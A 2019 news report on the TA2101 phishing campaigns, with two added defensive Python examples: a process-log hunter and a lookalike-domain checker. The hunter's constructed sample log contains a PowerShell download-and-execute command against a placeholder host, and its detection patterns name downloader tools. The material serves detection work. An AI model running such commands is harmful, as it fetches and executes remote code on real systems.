15 November 2019

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

Proofpoint researchers have uncovered a new phishing scheme that targets businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in business and IT services, manufacturing, and healthcare organizations.

The threat actor uses legitimate penetration testing and post-exploitation frameworks such as Cobalt Strike and Metasploit for its post-exploitation operations. The malware is delivered via spear-phishing emails purporting to come from tax authorities and other trusted public-facing entities.

Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with a backdoor, a banking Trojan, or ransomware. In all observed cases the attackers used malicious Word document attachments as the initial vector for compromising the victim's machine.

Once the document is opened and macros are enabled, the embedded Microsoft Office macro executes a PowerShell script, which downloads and installs one of the malicious payloads (Maze ransomware, the IcedID banking Trojan, or a Cobalt Strike backdoor) onto the victim's system.
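The Office-macro-to-PowerShell downloader chain described above is a reliable hunting signal regardless of which payload lands. The following is an added example, not code from the article or from Proofpoint: it scans a few constructed process-creation records for an Office parent spawning a shell and for downloader-style PowerShell arguments. The log format (timestamp|parent image|child image|command line), the sample events, the URL and the indicator list are assumptions for illustration, not TA2101 indicators of compromise.

```python
"""Hunt for the Office-macro -> PowerShell -> downloader chain in process-creation logs.

Added example, not code from the article or from Proofpoint. The pipe-separated
log format, the sample events below and the indicator list are constructed
assumptions, not TA2101 indicators of compromise.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a PowerShell download-and-execute stage (assumed list).
DOWNLOAD_INDICATORS = {
    "downloadstring":    re.compile(r"downloadstring", re.I),
    "downloadfile":      re.compile(r"downloadfile", re.I),
    "invoke-webrequest": re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "webclient":         re.compile(r"net\.webclient", re.I),
    "iex":               re.compile(r"invoke-expression|\biex\b", re.I),
    "encodedcommand":    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "frombase64":        re.compile(r"frombase64string", re.I),
    "hidden-window":     re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "ep-bypass":         re.compile(r"-e(xecution)?p(olicy)?\s+bypass", re.I),
    "lolbin-download":   re.compile(r"bitsadmin|certutil.*-urlcache", re.I),
}

# Constructed sample telemetry: one benign Word launch, one macro-spawned downloader,
# one ordinary admin PowerShell, and one Office->cmd with no downloader arguments.
SAMPLE_LOG = r"""2019-11-06T09:12:01Z|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\alice\Downloads\Steuerbescheid.doc"
2019-11-06T09:12:04Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
2019-11-06T09:15:30Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -Command Get-Process
2019-11-06T09:16:11Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c echo hello
"""


@dataclass
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_line(line: str) -> ProcEvent:
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent, image, cmdline)


def score_event(ev: ProcEvent):
    """Return (office_spawned_shell, [matched indicator names])."""
    chain = basename(ev.parent) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN
    hits = [name for name, rx in DOWNLOAD_INDICATORS.items() if rx.search(ev.cmdline)]
    return chain, hits


def hunt(log_text: str) -> list:
    """Return findings for every event that shows the chain, downloader arguments, or both."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        chain, hits = score_event(ev)
        if chain and hits:
            severity = "high"      # Office spawned a shell whose arguments look like a downloader
        elif chain or hits:
            severity = "medium"    # a single signal; worth a look, frequently benign
        else:
            continue
        findings.append({"ts": ev.ts, "severity": severity, "office_chain": chain,
                         "indicators": hits, "parent": basename(ev.parent),
                         "image": basename(ev.image), "cmdline": ev.cmdline})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["severity"], f["ts"], f["parent"], "->", f["image"], f["indicators"])
```

Run against the constructed log, the macro-spawned PowerShell line scores high (Office parent plus five downloader indicators), the Office-to-cmd line scores medium on the parent/child relationship alone, and the two benign lines are dropped. In production the same two signals map directly onto Sysmon Event ID 1 or EDR process-creation telemetry; the indicator list is a starting point to tune against your own baseline.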

To make the social engineering more convincing, the attackers also use stolen branding and lookalike domains of European tax agencies and other public-facing entities, such as Internet service providers and postal services. In the recent campaigns the phishing emails were observed to impersonate the following entities:

Bundeszentralamt für Steuern, the German Federal Central Tax Office,

Agenzia delle Entrate, the Italian Revenue Agency,

1&1 Internet AG, a German internet service provider,

USPS, the United States Postal Service.
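Lookalike sender domains built on the brands listed above are cheap to register and easy to miss by eye. The following is an added example, not code from the article or from Proofpoint: it checks a sender domain against an assumed allowlist of genuine domains for those four brands and flags brand tokens embedded in unrelated domains as well as one-character near misses after folding common character substitutions. The allowlist, the confusable table and every candidate domain are constructed assumptions, not the domains TA2101 actually used.

```python
"""Flag sender domains that imitate the impersonated brands named in the article.

Added example, not code from the article or from Proofpoint. BRANDS is an assumed
allowlist for illustration (maintain it from your own mail-flow data); the candidate
domains in the demo are constructed, not real TA2101 lookalike domains.
"""
import unicodedata

# brand label -> genuine registrable domains (assumed allowlist)
BRANDS = {
    "bzst": {"bzst.de"},                          # Bundeszentralamt für Steuern
    "agenziaentrate": {"agenziaentrate.gov.it"},  # Agenzia delle Entrate
    "1und1": {"1und1.de"},                        # 1&1 Internet AG
    "usps": {"usps.com"},                         # United States Postal Service
}

# Digits and symbols attackers swap for visually similar letters; brand and candidate
# are folded identically, so "1und1" and "lundl" compare equal.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"})


def fold(s: str) -> str:
    """Normalise a label for comparison (NFKC, lower-case, confusables, rn->m, vv->w).
    IDN/punycode decoding is out of scope here; feed already-decoded labels."""
    s = unicodedata.normalize("NFKC", s).lower().translate(CONFUSABLES)
    return s.replace("rn", "m").replace("vv", "w")


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_sender_domain(domain: str) -> list:
    """Return [(reason, brand), ...]; an empty list means no impersonation signal."""
    domain = domain.lower().rstrip(".")
    for legit in BRANDS.values():
        if domain in legit or any(domain.endswith("." + d) for d in legit):
            return []  # genuine domain, or a subdomain of one
    # Drop the last label only; proper public-suffix handling (gov.it, co.uk) is out of scope.
    labels = domain.split(".")[:-1]
    findings = []
    for brand in BRANDS:
        fb = fold(brand)
        for label in labels:
            fl = fold(label)
            if fl == fb:
                findings.append(("brand-label", brand))    # brand as a whole label elsewhere
            elif fb in fl:
                findings.append(("brand-token", brand))    # e.g. bzst-online, usps-delivery
            elif len(fb) >= 4 and levenshtein(fl, fb) <= 1:
                findings.append(("near-miss", brand))      # typo-squat or homoglyph swap
            else:
                continue
            break  # one finding per brand is enough
    return findings


if __name__ == "__main__":
    # Constructed candidates for the demo; none is a real campaign indicator.
    for d in ["bzst.de", "mail.bzst.de", "bzst-online.de", "bzsst.de",
              "usps-delivery.com", "1und1-kundenservice.de", "example.com"]:
        print(f"{d:28s} {check_sender_domain(d)}")
```

The registrable-domain check is deliberately simple; in a real mail gateway you would resolve the public suffix properly and decode punycode before folding. Matching on the brand token rather than on an exact domain list is what catches the "agency-name plus a plausible suffix" pattern the campaigns relied on.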

“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.

A more detailed analysis, along with Indicators of Compromise (IoCs) for the recent campaigns, is available in the Proofpoint blog post.
